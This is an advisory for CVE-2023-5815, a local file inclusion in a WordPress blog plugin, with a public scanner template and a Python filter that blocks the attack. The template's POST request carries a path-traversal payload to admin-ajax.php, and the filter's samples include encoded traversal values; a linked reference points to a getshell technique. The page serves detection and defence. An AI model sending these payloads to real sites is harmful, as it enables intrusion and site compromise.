CVE-2023-5815: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion

Date: 2025-12-02 | Affected software: News & Blog Designer Pack WordPress Blog Plugin | PoC: public

Vulnerability description

The News & Blog Designer Pack WordPress plugin, up to and including version 3.4.1, is vulnerable to remote code execution through a local file inclusion in the bdp_get_more_post function. Unauthenticated attackers can include arbitrary PHP files. Exploitation requires an AJAX request with crafted POST data.

PoC code [public]

id: CVE-2023-5815

info:
  name: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    The News & Blog Designer Pack WordPress plugin up to version 3.4.1 contains a remote code execution caused by local file inclusion in the bdp_get_more_post function, letting unauthenticated attackers include arbitrary PHP files, exploit requires AJAX request with crafted POST data.
  impact: |
    Attackers can include arbitrary PHP files, leading to remote code execution and full site compromise.
  remediation: |
    Update to the latest version beyond 3.4.1 or disable the vulnerable AJAX functionality.
  reference:
    - https://wordpress.org/plugins/blog-designer-pack/
    - https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-5815
    epss-score: 0.41397
    epss-percentile: 0.9725
    cpe: cpe:2.3:a:infornweb:news_\&_blog_designer_pack:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: infornweb
    product: news_\&_blog_designer_pack
    framework: wordpress
    publicwww-query: "/wp-content/plugins/blog-designer-pack/"
  tags: cve,cve2023,wordpress,wp,wp-plugin,blog-designer-pack,lfi,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bdp_get_more_post&shrt_param[design]=../../../../../wp-login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success"'
          - '"data"'
          - 'wp-login'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 490a00463044022037392bf388c476d34ff87a087b576f0a35a3181569d86ae3ddbddf391fbeda2902205d0ae1d62a74407dc5d102ad38945495e61579b35ea09247c6e23b5e61fdab63:922c64590222798bb761d5b6d8e72950
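
A request filter for the parameter the template above probes, as an added example (not part of the original template or of the plugin): it classifies admin-ajax.php POST bodies and accepts `shrt_param[design]` only when the value is a plain slug. The slug pattern, the function names and the sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Names taken from the template on this page.
VULN_ACTION = "bdp_get_more_post"
DESIGN_KEY = "shrt_param[design]"
# Assumption: legitimate design names are short slugs. The plugin's real
# design list is not on this page, so adjust the pattern to your install.
SAFE_DESIGN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def php_key(key):
    """Normalise a field name the way PHP does before filling $_POST:
    leading spaces are dropped, spaces and dots in the base name become '_'."""
    head, bracket, rest = key.lstrip(" ").partition("[")
    return re.sub(r"[ .]", "_", head) + bracket + rest


def inspect_body(body):
    """Classify one urlencoded POST body sent to /wp-admin/admin-ajax.php.
    Returns (verdict, reason); verdict is 'ignore', 'allow' or 'block'."""
    fields = [(php_key(k), v) for k, v in parse_qsl(body, keep_blank_values=True)]
    if VULN_ACTION not in [v for k, v in fields if k == "action"]:
        return ("ignore", "not the bdp_get_more_post action")
    # startswith also catches array forms such as shrt_param[design][]
    designs = [v for k, v in fields if k.startswith(DESIGN_KEY)]
    for value in designs:
        # Allowlist instead of hunting for '../': anything that is not a
        # plain slug (slashes, dots, %-escapes, NUL bytes) is rejected.
        if not SAFE_DESIGN.fullmatch(value):
            return ("block", "design is not a plain slug: %r" % value)
    return ("allow", "%d design value(s), all plain slugs" % len(designs))


# Constructed sample bodies (the first is the request shown in the template).
SAMPLES = [
    "action=bdp_get_more_post&shrt_param[design]=../../../../../wp-login",
    "action=bdp_get_more_post&shrt_param%5Bdesign%5D=%252e%252e%252fwp-login",
    "action=bdp_get_more_post&shrt.param[design]=..%5Cwp-login",
    "action=bdp_get_more_post&shrt_param[design]=grid-1",
    "action=heartbeat&interval=60",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_body(sample)[0], "<-", sample)
```

The same allowlist check can run over captured request bodies to find past probes; updating the plugin beyond 3.4.1 remains the fix named in the template's remediation field.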
